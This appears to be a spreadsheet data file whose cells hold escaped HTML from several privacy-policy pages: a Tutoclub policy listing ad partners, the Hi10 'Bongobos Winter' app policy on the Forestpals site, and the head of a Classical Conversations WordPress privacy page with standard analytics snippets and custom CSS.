        &lt;p&gt;By creating your Tutoclub account, you may agree to receive our newsletters or other emails promoting any special offer(s). You can always opt out from receiving special promotions or marketing correspondence from us by unsubscribing as noted in the respective email correspondence.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;&lt;b&gt;How and why we use this data&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;</t>
  </si>
  <si>
    <t>We will use this data only to authenticate a user and manage the user’s subscription (e.g. to determine on how many devices subscription has been activated). We process your personal data ourselves, therefore personal information is not disclosed to any third party.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;Please note that you have the right to cancel your subscription anytime, however your personal data collected before subscription cancellation will be stored for a period of three years in order to comply with our legal obligations and protect our legal interests.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;OUR COOKIE POLICY&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;When you use our services, we may use industry-wide technologies such as cookies and/or other technologies, hardware-based device identifiers, flash cookies, operating system-based identifiers and web beacons.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;Cookies are small text files that we place in visitors’ computer browsers to store their preferences._x005F_x000D_
           The cookies are created for each session, they do not include or collect any information about you other than your session key, and they are removed as soon as the session ends (usually done automatically by your web browser).&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
        &lt;p&gt;You can disable cookies on your device or set your device to alert you when cookies are being sent to your device.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;If you do not accept, block or erase cookies, or change the settings, your online experience may be limited.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt; We may also use certain third-party cookies (e.g. Google Authentication). These are different kinds of cookies that are stored on your computer by third parties.</t>
  </si>
  <si>
    <t>This kind of cookie is only read (and is not altered by the Service) each time you use our Services. Third party cookies store only Usage Data, such as the different pages you have visited strictly within the Service (such the “About” page, the “Contact Us” page, the duration of your browsing session, etc.).&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;WHO MAY ACCESS YOUR PERSONAL DATA&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt; We may share your personal information with a few selected third parties, such as:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;ul&gt;_x005F_x000D_
          &lt;li&gt;Companies of our group, third-party service providers and other partners (e.g. to ensure the provision of our Services, to provide services or to improve our Services security), as well as to those who otherwise process Personal Data for the purposes specified in this Privacy Policy.</t>
  </si>
  <si>
    <t xml:space="preserve">Here is a list of our current service providers and partners (see section Our third-party data controllers and processors).&lt;/li&gt;_x005F_x000D_
          &lt;li&gt;To any competent law enforcement authority, regulatory authority, government agency, court, or other third party, if we consider that disclosure is necessary (i) in accordance with applicable laws or regulations, (ii) to exercise or to protect our rights, or (iii) to protect our or any other person's interests;&lt;/li&gt;_x005F_x000D_
          &lt;li&gt;A potential or actual buyer (and its representatives and advisers) involved in the purchase, merger or acquisition of a proposed or actual any part of our business, provided that we inform the buyer that it will have to use your Personal Data only for the purposes specified in this Privacy Policy;&lt;/li&gt;_x005F_x000D_
          &lt;li&gt;Any other person with your consent to disclose information.&lt;/li&gt;_x005F_x000D_
        &lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;INFORMATION ABOUT THIRD-PARTY DATA CONTROLLERS AND PROCESSORS&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;KIDOZ &lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;KIDOZ is an advertising service provided by KIDOZ Ltd. KIDOZ uses Personal and Non-Personal Data only for internal purposes.&lt;/p&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Legal basis of processing: &lt;/b&gt;legitimate interests (support for internal operations).&lt;/p&gt;_x005F_x000D_
            &lt;p&gt;Processing location: USA&lt;br&gt;_x005F_x000D_
               Privacy policy: &lt;a class="underline" href="https://kidoz.net/website-and-kidoz-sdk-privacy-policy"&gt;https://kidoz.net/website-and-kidoz-sdk-privacy-policy&lt;/a&gt;&lt;br&gt;_x005F_x000D_
              Address: KIDOZ, PO BOX 8517, Poleg Industrial park, Netanya, Israel&lt;br&gt;_x005F_x000D_
              Phone: +972-9-7716444&lt;br&gt;_x005F_x000D_
              Contact: &lt;a class="underline" href="mailto:support@kidoz.com"&gt;support@kidoz.com&lt;/a&gt;_x005F_x000D_
            &lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Chartboost (Chartboost, Inc.)&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;Chartboost is an advertising service provided by Chartboost, Inc. Chartboost uses Personal and Non-Personal Data only for internal purposes.&lt;/p&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Legal basis of processing: &lt;/b&gt;legitimate interests (support for internal operations).&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;p&gt;Place of processing: USA&lt;br&gt;_x005F_x000D_
              Privacy policy: &lt;a class="underline" href="https://answers.chartboost.com/en-us/articles/200780269"&gt;https://answers.chartboost.com/en-us/articles/200780269&lt;/a&gt;&lt;br&gt;_x005F_x000D_
              Address: 85 2nd Street, Suite 100, San Francisco, CA 94105, US&lt;br&gt;_x005F_x000D_
              Contact: &lt;a class="underline" href="mailto:privacy@chartboost.com"&gt;privacy@chartboost.com&lt;/a&gt;_x005F_x000D_
            &lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;SuperAwesome Trading Ltd&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;SuperAwesome is a contextual advertising service provided by SuperAwesome Trading Ltd. SuperAwesome uses Personal and Non-Personal Data only for internal purposes.&lt;/p&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Legal basis of processing: &lt;/b&gt;legitimate interests (support for internal operations).&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;p&gt;Place of processing: UK&lt;br&gt;_x005F_x000D_
              </t>
  </si>
  <si>
    <t xml:space="preserve">Privacy policy: &lt;a class="underline" href="https://www.superawesome.tv/privacy-policy"&gt;https://www.superawesome.tv/privacy-policy&lt;/a&gt;&lt;br&gt;_x005F_x000D_
              Address: Trading Ltd, 22 Long Acre, London WC2E 9LY, United Kingdom&lt;br&gt;_x005F_x000D_
              Contact: &lt;a class="underline" href="mailto:privacy@superawesome.com"&gt;privacy@superawesome.com&lt;/a&gt;_x005F_x000D_
            &lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
         </t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
&lt;meta name="description" content="Forest Pals Autumn is the first in a series of four educational apps about the seasons. We aim to provide a fun and engaging training tool, filled with stories, games and music for preschoolers. "&gt;
&lt;meta name="keywords" content="forestpals, forest, autumn, seasons, educational, school, learning, training, preschool, preschooler, toddler, infant, child, children, app, tablet, iPad"&gt;
&lt;link rel="image_src" href="http://www.forestpals.com/img/fb.jpg" /&gt;
&lt;link rel="stylesheet" type="text/css" href="../css/press.css"&gt;&lt;/link&gt;
&lt;meta property="og:image" content="http://www.forestpals.com/img/fb.jpg" /&gt;
&lt;meta property="og:title" content="Forestpals" /&gt;
&lt;title&gt;Forestpals - Privacy Policy&lt;/title&gt;
&lt;script&gt;
(function(i, s, o, g, r, a, m) {
    i['GoogleAnalyticsObject'] = r;
    i[r] = i[r] || function() {
        (i[r].q = i[r].q ||</t>
  </si>
  <si>
    <t>[]).push(arguments)
    }, i[r].l = 1 * new Date();
    a = s.createElement(o), m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js',
        'ga');
ga('create', 'UA-24693301-3', 'forestpals.com');
ga('send', 'pageview');
&lt;/script&gt;
&lt;!--[if IE]&gt;
&lt;script src="http://html5shim.googlecode.com/svn/trunk/html5.js"&gt;&lt;/script&gt;
&lt;!</t>
  </si>
  <si>
    <t xml:space="preserve">[endif]--&gt;
&lt;/head&gt;
&lt;body&gt;
	&lt;div class="wrapper"&gt;
		&lt;div class="main"&gt;
			&lt;div class="header"&gt;&lt;/div&gt;
			&lt;div class="contentContainer"&gt;
				&lt;div class="logo"&gt;
					&lt;img src="../img/logo.png"&gt;
				&lt;/div&gt;
				&lt;div class="player"&gt;
					&lt;h1&gt;Privacy policy&lt;/h1&gt;
					&lt;br /&gt;
						Hi10 built the Bongobos Winter app as
	                	a Commercial app. This SERVICE is provided by
	                	Hi10  and is intended for use as
	                	is.
	                 &lt;br /&gt;
					&lt;br /&gt;
						</t>
  </si>
  <si>
    <t>This page is used to inform visitors regarding our
						policies with the collection, use, and disclosure of Personal
						Information if anyone decided to use our Service.
	                 &lt;br /&gt;
					&lt;br /&gt;
						If you choose to use our Service, then you agree to
						the collection and use of information in relation to this
						policy. The Personal Information that we collect is
						used for providing and improving the Service.</t>
  </si>
  <si>
    <t xml:space="preserve">We will not use or share your information with
						anyone except as described in this Privacy Policy.
					 &lt;br /&gt;
					&lt;br /&gt;
						 The terms used in this Privacy Policy have the same meanings
						as in our Terms and Conditions, which is accessible at
						Bongobos Winter unless otherwise defined in this Privacy Policy.
					</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Information Collection and Use&lt;/H1&gt;
					&lt;br /&gt;
						For a better experience, while using our Service, we
						may require you to provide us with certain personally
						identifiable information. The information that
						we request will be retained by us and used as described in this privacy policy.
					 &lt;br /&gt;
					&lt;br /&gt;
					&lt;div&gt;
						The app does use third party services that may collect
						information used to identify you.
						</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br /&gt;
						&lt;br /&gt;
						Link to privacy policy of third party service providers used
						by the app
						&lt;br /&gt;
						&lt;ul&gt;
							&lt;li&gt;&lt;a href="https://www.google.com/policies/privacy/" target="_blank" rel="noopener noreferrer"&gt;Google Play Services&lt;/a&gt;
							&lt;/li&gt;
							&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;
							&lt;li&gt;&lt;a href="https://unity3d.com/legal/privacy-policy" target="_blank" rel="noopener noreferrer"&gt;Unity&lt;/a&gt;
							&lt;/li&gt;
							&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;
						&lt;/ul&gt;
					&lt;/div&gt;
					&lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Log Data&lt;/H1&gt;
					&lt;br /&gt;
						 We want to inform you that whenever you
						use our Service, in a case of an error in the app
						we collect data and information (through third party
						products) on your phone called Log Data. This Log Data may
						include information such as your device Internet Protocol
						(“IP”) address, device name, operating system version, the
						configuration of the app when utilizing our Service,
						the time and date of your use of the Service, and other
						statistics.
					</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Cookies&lt;/H1&gt;
					&lt;br /&gt;
						Cookies are files with a small amount of data that are
						commonly used as anonymous unique identifiers. These are sent
						to your browser from the websites that you visit and are
						stored on your device's internal memory.
					 &lt;br /&gt;
					&lt;br /&gt;
						</t>
  </si>
  <si>
    <t>This Service does not use these “cookies” explicitly. However,
						the app may use third party code and libraries that use
						“cookies” to collect information and improve their services.
						 You have the option to either accept or refuse these cookies
						and know when a cookie is being sent to your device.</t>
  </si>
  <si>
    <t xml:space="preserve">If you
						choose to refuse our cookies, you may not be able to use some
						portions of this Service.
					 &lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Service Providers&lt;/H1&gt;
					&lt;br /&gt;
						 We may employ third-party companies and
						individuals due to the following reasons:
						&lt;br /&gt;
						&lt;ul&gt;&lt;li&gt;To facilitate our Service;&lt;/li&gt;
							&lt;li&gt;To provide the Service on our behalf;&lt;/li&gt;
							&lt;li&gt;To perform Service-related services; or&lt;/li&gt;
							&lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;
						&lt;/ul&gt;
					&lt;br /&gt;
						</t>
  </si>
  <si>
    <t xml:space="preserve">We want to inform users of this Service
						that these third parties have access to your Personal
						Information. The reason is to perform the tasks assigned to
						them on our behalf. However, they are obligated not to
						disclose or use the information for any other purpose.
					</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Security&lt;/H1&gt;
					&lt;br /&gt;
						 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t>
  </si>
  <si>
    <t>&lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Links to Other Sites&lt;/H1&gt;
					&lt;br /&gt;
						 This Service may contain links to other sites. If you click on
						a third-party link, you will be directed to that site.</t>
  </si>
  <si>
    <t xml:space="preserve">Note
						that these external sites are not operated by us.
						 Therefore, we strongly advise you to review the
						Privacy Policy of these websites. We have
						no control over and assume no responsibility for the content,
						privacy policies, or practices of any third-party sites or
						services.
					</t>
  </si>
  <si>
    <t>&lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Children’s Privacy&lt;/H1&gt;
					&lt;br /&gt;
						 These Services do not address anyone under the age of 13.
						 We do not knowingly collect personally
						identifiable information from children under 13 years of age.</t>
  </si>
  <si>
    <t xml:space="preserve">In the case
						we discover that a child under 13 has provided
						us with personal information, we immediately
						delete this from our servers. If you are a parent or guardian
						and you are aware that your child has provided us with
						personal information, please contact us so that
						we will be able to do necessary actions.
					 &lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Changes to This Privacy Policy&lt;/H1&gt;
					&lt;br /&gt;
						</t>
  </si>
  <si>
    <t xml:space="preserve">We may update our Privacy Policy from
						time to time. Thus, you are advised to review this page
						periodically for any changes. We will
						notify you of any changes by posting the new Privacy Policy on
						this page.
					</t>
  </si>
  <si>
    <t>&lt;br /&gt;
						 This policy is effective as of 2021-06-03
					&lt;br /&gt;
					&lt;br /&gt;
					&lt;H1&gt;Contact Us&lt;/H1&gt;
					&lt;br /&gt;
						If you have any questions or suggestions about our
						Privacy Policy, do not hesitate to contact us at info@hi10.be.
					 &lt;br /&gt;
					&lt;br /&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
        &lt;div class="footer"&gt;
            a &lt;a href="http://www.grin.be"&gt;&lt;img src="../img/grin_footer.png"
                style="position: relative; top: 4px;"&gt;&lt;/a&gt; production, supported
            by &lt;a href="http://www.vaf.be"&gt;&lt;img src="../img/vaf.png"
                style="position: relative; top:</t>
  </si>
  <si>
    <t>30px;"&gt;&lt;/a&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;
        &lt;/div&gt;
	&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!doctype html&gt;
&lt;html class="no-js" lang="en-US"&gt;
&lt;head&gt;
     &lt;title&gt;Privacy Policy | Classical ConversationsClassical Conversations&lt;/title&gt;
    &lt;meta charset="UTF-8" /&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
    &lt;link rel="pingback" href="https://classicalconversations.com/xmlrpc.php" /&gt;
            &lt;link rel="shortcut icon" href="https://classicalconversations.com/wp-content/uploads/2021/05/favicon-classical-conversations.png" type="image/png" /&gt;
        &lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
	&lt;!-- This site is optimized with the Yoast SEO plugin v20.3 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;meta name="description" content="Read our Privacy Policy&amp;quot;."</t>
  </si>
  <si>
    <t>/&gt;
	&lt;link rel="canonical" href="https://classicalconversations.com/cc-privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy | Classical Conversations" /&gt;
	&lt;meta property="og:description" content="Read our Privacy Policy&amp;quot;." /&gt;
	&lt;meta property="og:url" content="https://classicalconversations.com/cc-privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Classical Conversations" /&gt;
	&lt;meta property="article:modified_time" content="2022-01-24T22:54:33+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="22 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://classicalconversations.com/cc-privacy-policy/","url":"https://classicalconversations.com/cc-privacy-policy/","name":"Privacy Policy | Classical Conversations","isPartOf":{"@id":"https://classicalconversations.com/#website"},"datePublished":"2021-07-22T21:33:45+00:00","dateModified":"2022-01-24T22:54:33+00:00","description":"Read our Privacy Policy\". ","breadcrumb":{"@id":"https://classicalconversations.com/cc-privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://classicalconversations.com/cc-privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://classicalconversations.com/cc-privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://classicalconversations.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://classicalconversations.com/#website","url":"https://classicalconversations.com/","name":"Classical Conversations","description":"","publisher":{"@id":"https://classicalconversations.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://classicalconversations.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://classicalconversations.com/#organization","name":"Classical Conversations","url":"https://classicalconversations.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://classicalconversations.com/#/schema/logo/image/","url":"https://classicalconversations.com/wp-content/uploads/2021/05/logo-blue.png","contentUrl":"https://classicalconversations.com/wp-content/uploads/2021/05/logo-blue.png","width":329,"height":200,"caption":"Classical Conversations"},"image":{"@id":"https://classicalconversations.com/#/schema/logo/image/"}}]}&lt;/script&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>/ Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//js.hs-scripts.com' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://classicalconversations.com/wp-includes/css/classic-themes.min.css?ver=1'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t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='styles-css' href='https://classicalconversations.com/wp-content/themes/pdm/dist/main.css?ver=6.1.1' type='text/css' media='screen' /&gt;
&lt;link rel="https://api.w.org/" href="https://classicalconversations.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://classicalconversations.com/wp-json/wp/v2/pages/937" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://classicalconversations.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://classicalconversations.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel='shortlink' href='https://classicalconversations.com/?p=937' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://classicalconversations.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclassicalconversations.com%2Fcc-privacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://classicalconversations.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclassicalconversations.com%2Fcc-privacy-policy%2F&amp;#038;format=xml" /&gt;
			&lt;!-- DO NOT COPY THIS SNIPPET!</t>
  </si>
  <si>
    <t>Start of Page Analytics Tracking for HubSpot WordPress plugin v10.0.25--&gt;
			&lt;script type="text/javascript" class="hsq-set-content-id" data-content-id="standard-page"&gt;
				var _ hsq = _hsq ||</t>
  </si>
  <si>
    <t>[];
				_hsq.push(["setContentType", "standard-page"]);
			&lt;/script&gt;
			&lt;!-- DO NOT COPY THIS SNIPPET! End of Page Analytics Tracking for HubSpot WordPress plugin --&gt;
					&lt;style type="text/css" id="wp-custom-css"&gt;
			/* CSS for Conventions Calendar */
#label-state-text{
	display: block;
}
.state-selector{
	width: 80%;
	margin-top: 1.5em;
	margin: auto;
}
.conventions_list{
	margin-bottom: 5em;
}
.conventions_heading{
	vertical-align: middle;
}
.search-input-text{
	margin-bottom: .5em;
	margin-top: 1em;
	display: flex;
	justify-content: flex-end;
	margin-right: 4.5em;
	position: relative;
	top: 27em;
}
.search-input-paragraph{
	display: flex;
	justify-content: flex-end;
	width: 30%;
}
#myInput{
	width: 20%;
	text-align: center;
	display: flex;
	justify-content: flex-end;
	float: right;
	margin-right: 4.5em;
	position: relative;
	top: 27em;
}
.conventions-page-content{
	overflow: clip;
}
#myTable-conventions{
	width: 90%;
	margin: 0 auto;
	margin-top: 3em;
}
#FilterForm{
	margin: auto;
	text-align: center;
	border: 1px solid #FBEFE5;
	margin-top: 1em;
	width: 80%;
	background-color: #59637E;
	color: #FBEFE5;
}
.leigh_check{
	margin-right: 1em;
}
.conventions-disclaimer{
	text-align: center;
	width: 80%;
	margin: auto;
	margin-top: 9em;
}
/* Conventions Table */
@media only screen and (max-width: 768px)</t>
  </si>
  <si>
    <t>{
.conventions_table td:nth-child(2) a {
    display: block;
}
}
/* Standard Tables */
table.conventions_table {
	border-collapse: collapse;
  border-right: 10px solid #F5DECE;
	margin-bottom:60px;
	margin-right: 0px;
	margin-left: 0px;
}
.ff-richtext .conventions_table</t>
  </si>
  <si>
    <t>td, .ff-richtext .conventions_table th{
	border:none;
}
.conventions_table th,
.conventions_table td {
  padding: 0.5em;
  text-align: center;
  min-width:190px;
	height:85px;
}
.conventions_table</t>
  </si>
  <si>
    <t>td img{
	padding:0;
	margin:0;
	width:100%;
	max-width:45px;
}
.conventions_table td:first-of-type {
  text-align: left;
  min-width:200px;
}
.conventions_table td:nth-of-type(2) {
}
.conventions_table</t>
  </si>
  <si>
    <t>th {
  color: #fff;
	width: 250px;
}
.conventions_table th:first-of-type{
  background-color: #F5DECE;
	width: 30%;
}
.conventions_table th:nth-of-type(even){
  background-color: #041E42;
	font-size: 20px;
}
.conventions_table</t>
  </si>
  <si>
    <t>th:nth-of-type(odd){
  background-color: #59637E;
	font-size:20px;
}
 .conventions_table td:first-child{
  color: #041E42;
  font-weight: 600;
  border-bottom: 5px solid #F5E0CF;
  background: #FBEFE5;
}
.conventions_table</t>
  </si>
  <si>
    <t>td:nth-child(even){
  background-color: #041E42;
  color: #FFF;
  background-color: #59637E;
  border-bottom: 5px solid #041E42;
}
.conventions_table td:nth-child(2n+3) {
  color: #FFF;
  border-bottom:</t>
  </si>
  <si>
    <t>5px solid #59637E;
  background: #838a9e; 
}
.conventions_table td img{
	margin-top: 1em;
}
@media only screen and (max-width: 960px){
	.conventions_table th:nth-of-type(3){
  background-color: #59637E;
	font-size:10px;
	font-weight:600;
}
}
/* ---------------------------
--------Fixed Headers---------
------------------------------*/
/* .conventions_table th {
  position: -webkit-sticky;
  position: -moz-sticky;
  position: -ms-sticky;
  position: -o-sticky;
  position: sticky;
  top: 120px;
  z-index: 2;
} */
/* .conventions_table th[scope=row] {
  position: -webkit-sticky;
  position: sticky;
  left: 0;
  z-index: 1;
	background: linear-gradient(90deg, transparent 0%, transparent calc(100% - .05em), #d6d6d6 calc(100% - .05em), #d6d6d6 100%);
}
 */
.conventions_table th[scope=row] {
  vertical-align: top;
  color: inherit;
  background-color: inherit;
  background: linear-gradient(90deg, transparent 0%, transparent calc(100% - .05em), #d6d6d6 calc(100% - .05em), #d6d6d6 100%);
}
table:nth-of-type(2) th:not([scope=row]):first-child {
  left: 0;
  z-index: 3;
  background: linear-gradient(90deg, #666 0%, #666 calc(100% - .05em), #ccc calc(100% - .05em), #ccc 100%);
}
/* Strictly for making the scrolling happen.</t>
  </si>
  <si>
    <t>*/
.conventions_table th[scope=row] + td {
  min-width: 24em;
}
.conventions_table th[scope=row] {
  min-width: 20em;
}
/* @media only screen and (max-width: 960px) {
.conventions_table th{
	position: -webkit-sticky;
  position: -moz-sticky;
  position: -ms-sticky;
  position: -o-sticky;
  position: sticky;
  top: 10px;
  z-index: 110;
	}
} */
/*---------------------------------------Table on Phone Screens----------------------------------------------*/
@media only screen and (max-width: 600px){
	.conventions_table th,
	.conventions_table td {
  padding: 0.1em;
  text-align: center;
  min-width: 50px;
	height: 25px;
}
/* 	.conventions_table th{
	position: -webkit-sticky;
  position: -moz-sticky;
  position: -ms-sticky;
  position: -o-sticky;
  position: sticky;
  top: 10px;
  z-index: 110;
	} */
.conventions_table td img{
	padding:0;
	margin:0;
	width:50%;
	max-width:25px;
}
	.conventions_table .cc_logo_comp_tbl{
	padding: 1px;
	width: 100px;
	height: 25px;
	}
	.conventions_table</t>
  </si>
  <si>
    <t>td:first-of-type {
  text-align: left;
  min-width:100px;
}
}
.conventions-banner{
	margin-top: -2em;
	background-image: url(https://cctest.classicaltesting.net/wp-content/uploads//2023/04/Conventions_Image_4.jpg);
	height: 400px;
	background-position: center;
	background-repeat: no-repeat;
	background-size: cover;
}
@media screen and (max-width: 699px) {
	.conventions-banner{
	margin-top: -2em;
	background-image: url(https://cctest.classicaltesting.net/wp-content/uploads//2023/04/Conventions_image_mobile_2.jpg);
	height: 400px;
	background-position: center;
	background-repeat: no-repeat;
	background-size: cover;
}
.search-input-text{ 
	position: relative;
	top: 31em;		
	}
	#myInput{
		position: relative;
		top: 31em;
	}
}
@media screen and (max-width: 300px) {
.search-input-text{ 
	position: relative;
	top: 33em;		
	}
	#myInput{
		position: relative;
		top: 33em;
	}
}
@media screen and (min-width: 700px) and (max-width: 1000px) {
		.conventions-banner{
	margin-top: -2em;
	background-image: url(https://cctest.classicaltesting.net/wp-content/uploads//2023/04/Conventions_image_mobile_2.jpg);
	height: 400px;
	background-position: center;
	background-repeat: no-repeat;
	background-size: cover;
}
}
 /* End of CSS for Conventions Calendar */ 
#bsf_rt_progress_bar_container{
	top: 7.75em;
}
@media (max-width: 1200px){
	#bsf_rt_progress_bar_container{
	top: 6.5em;
	}
}
@media (max-width: 960px){
	#bsf_rt_progress_bar_container{
	top: 6.5em;
	}
}
@media (max-width: 500px){
	#bsf_rt_progress_bar_container{
		top: 7em;
	}
}
.pid-396 .container.container--small{
	   width:100%;
	   max-width:1300px;
}
.fifty-fifty__program h3 img.heading_icon {
    bottom: -7.9px;
    margin-right: 6.5px;
}
.hero-top .hero-program__name {
    font-weight: 650;
}
h3.hero-program__name .svg-icon.svg-icon--c-mark {
    font-size: 1.8rem;
    margin-right: 9.5px;
}
.fifty-fifty__program h3 .svg-icon.svg-icon--c-mark {
    font-size: 1.8rem;
    margin-right: 9.5px;
}
h3.hero-program__name .svg-icon.svg-icon--c-mark .positioner {
    top: 4.2px;   
}
.fifty-fifty__program h3 .svg-icon.svg-icon--c-mark .positioner {
    top: 4.2px;   
}
.fifty-fifty__program[data-program-color="blue"] .svg-icon path, .fifty-fifty__program[data-program-color="orange"] .svg-icon path, .fifty-fifty__program[data-program-color="green"] .svg-icon path, .fifty-fifty__program[data-program-color="red"] .svg-icon path{
	fill: #041E42;
}
.hero-top .hero-program[data-program-color="blue"] .svg-icon path, .hero-top .hero-program[data-program-color="orange"] .svg-icon path, .hero-top .hero-program[data-program-color="green"] .svg-icon path, .hero-top .hero-program[data-program-color="red"] .svg-icon path{
	fill: #041E42;
}
.hero--programs .hero__title{
	text-align:center;
}
@media (min-width: 960px){
 .gheader .menu</t>
  </si>
  <si>
